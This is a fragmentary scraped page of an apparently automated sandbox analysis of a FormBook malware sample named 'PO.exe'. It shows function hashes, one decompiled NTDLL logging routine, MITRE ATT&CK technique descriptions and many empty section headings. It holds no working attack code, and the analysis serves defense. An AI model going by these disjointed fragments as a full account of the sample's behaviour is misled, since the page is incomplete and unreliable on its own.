Opcode ID: 6f536b0b01077d86152a2a3cf023b86940099eef3e14c1d7fc89a8486a09fe24
Instruction ID: 918005ec7daba52e7547c96dfb64b794448696b03022062bc95b87bf9dca5cb1
Opcode Fuzzy Hash: 6f536b0b01077d86152a2a3cf023b86940099eef3e14c1d7fc89a8486a09fe24
Instruction Fuzzy Hash: 3EC08CBE64051C9FC660FA95E808AA7B39A9E85311320865AD85C626109A3289AA45A0

Uniqueness

Uniqueness Score: -1.00%

Function 02D9967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D99694

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 396b5a6c2c06baaa4d1740f273b91553f3381250fb6a11eb1199996145e462b6
Instruction ID: db1ffb1c9c7ba4f3123512f0617f6336619d1d092c99e3680306c8dc173987a1
Opcode Fuzzy Hash: 396b5a6c2c06baaa4d1740f273b91553f3381250fb6a11eb1199996145e462b6
Instruction Fuzzy Hash: 26B092B29024C5DAEB11E7A54A18B2B7A01BBD4741F66C066E20206A1A4B78C8D1F6B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02DEFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E02DEFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02D9CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02DE5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02DE5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x02defdda
0x02defde2
0x02defde5
0x02defdec
0x02defdfa
0x02defdff
0x02defe0a
0x02defe0f
0x02defe17
0x02defe1e
0x02defe19
0x02defe19
0x02defe19
0x02defe20
0x02defe21
0x02defe22
0x02defe25
0x02defe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DEFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02DEFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02DEFE01

Memory Dump Source

Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true

Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 4a90d21d350a98751d25fdab66c8b221b1eca7c710ab573d76e0b653c7c37f84
Instruction ID: e23ae2c1ab58486f1e39949384f30bf0e86e1a159e1ccca99b2e37495c567c9d
Opcode Fuzzy Hash: 4a90d21d350a98751d25fdab66c8b221b1eca7c710ab573d76e0b653c7c37f84
Instruction Fuzzy Hash: B1F0F676200201BFEA203A55EC06F23BB6BEB44B70F140315F629566D1DA62FC30CAF0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PO.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 0041827A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37
filenativeCOMMON

Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Function 004181CA, Relevance: 1.5, APIs: 1, Instructions: 42
filenativeCOMMON

Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 004183AA, Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON